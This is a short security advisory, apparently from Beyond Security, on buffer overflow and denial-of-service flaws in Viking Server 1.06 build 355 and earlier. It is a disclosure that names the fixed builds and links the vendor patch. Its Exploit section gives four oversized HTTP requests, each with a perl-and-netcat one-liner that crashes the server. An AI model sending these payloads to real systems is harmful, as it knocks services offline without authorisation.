[ SOURCE: http://www.secureroot.com/security/advisories/9677979915.html ]
SUMMARY
Viking Server is a multi-protocol
Internet server/proxy for Windows 95/NT that supports a wide range of
protocols such as HTTP, FTP, SOCKS, DNS, TELNET, SMTP, POP3, UUCP, FCP,
ICP, etc. Unfortunately it does not perform proper buffer bounds checking,
enabling attackers to launch a buffer overflow attack and possibly execute
arbitrary code. Also, an incorrect parsing of non-date data causes an
exception, enabling remote attackers to cause a Denial of Service attack
against the product.
DETAILS
Vulnerable systems:
Viking 1.06 build 355 and prior
Immune systems:
Viking 1.06 build 370 and above
Exploit:
Any of the following HTTP commands will crash the server:
(1)
GET [x11765] HTTP/1.1
(Cmd: perl -e "print \"GET @{['x'x11765]} HTTP/1.1\n\n\""|nc 127.1 80)
(2)
GET / HTTP/1.1
Unless-Modified-Since: [x14765]
(Cmd: perl -e "print \"GET / HTTP/1.1\nUnless-Modified-Since:
@{['x'x14765]}\n\n\""|nc 127.1 80)
(3)
GET / HTTP/1.1
If-Range: [x14765]
(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Range: @{['x'x14765]}\n\n\""|nc
127.1 80)
(4)
GET / HTTP/1.1
If-Modified-Since: [x14765]
(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Modified-Since:
@{['x'x14765]}\n\n\""|nc 127.1 80)
Patch:
Robotex has responded immediately and released a patch that deals with
these issues.
You can download the patch at:
ftp://ftp.robtex.com/robtex/viking/beta/viking.zip
http://www.robtex.com/files/viking/beta/viking.zip
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
====================
--
Aviram Jenik
Beyond Security Ltd.
http://www.BeyondSecurity.com
http://www.SecuriTeam.com